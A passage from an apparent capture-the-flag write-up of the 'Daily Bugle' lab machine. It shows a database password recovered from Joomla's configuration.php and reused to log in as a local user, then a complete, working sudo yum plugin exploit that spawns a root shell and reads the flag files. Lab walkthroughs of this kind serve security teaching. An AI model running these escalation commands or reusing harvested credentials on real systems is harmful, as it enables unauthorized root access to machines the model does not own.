/var/www/html/configuration.php:        public $password = 'nv5uz9r3ZEDzVjNu';                                                                                                                                                             
/var/www/html/libraries/joomla/log/logger/database.php:                 $this->password = (empty($this->options['db_pass'])) ? '' : $this->options['db_pass'];
/var/www/html/libraries/joomla/log/logger/database.php:                 $this->password = null;
/var/www/html/libraries/joomla/log/logger/database.php:                 'password' => $this->password,
```

Local accounts often reuse the database password, so let's try it against `jjameson`:

```shell
bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu

[jjameson@dailybugle tmp]$ sudo -l
sudo -l
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
```

Great, so `jjameson` can run `/usr/bin/yum` as root without a password.

The yum escalation below is documented on GTFOBins:

```url
https://gtfobins.github.io/gtfobins/yum/
```

It works because `yum -c` accepts an arbitrary config file, that config can enable plugins from a directory we control, and a plugin's `init_hook` runs with yum's privileges, i.e. as root. A sudo rule that allows yum as root is therefore equivalent to granting root. Escalate from `jjameson` to `root`:

```shell
[jjameson@dailybugle tmp]$ TF=$(mktemp -d)
TF=$(mktemp -d)
[jjameson@dailybugle tmp]$ cat >$TF/x<<EOF
cat >$TF/x<<EOF
> [main]
[main]
> plugins=1
plugins=1
> pluginpath=$TF
pluginpath=$TF
> pluginconfpath=$TF
pluginconfpath=$TF
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.conf<<EOF
cat >$TF/y.conf<<EOF
> [main]
[main]
> enabled=1
enabled=1
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.py<<EOF
cat >$TF/y.py<<EOF
> import os
import os
> import yum
import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
requires_api_version='2.1'
> def init_hook(conduit):
def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
  os.execl('/bin/sh','/bin/sh')
> EOF
EOF
[jjameson@dailybugle tmp]$ sudo yum -c $TF/x --enableplugin=y
sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
whoami
root
sh-4.2# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
[root@dailybugle tmp.xUQmxLM2mw]# cat /root/root.txt
cat /root/root.txt
#flaghidden
[root@dailybugle tmp.xUQmxLM2mw]# cat /home/jjameson/user.txt
cat /home/jjameson/user.txt
#flaghidden
```
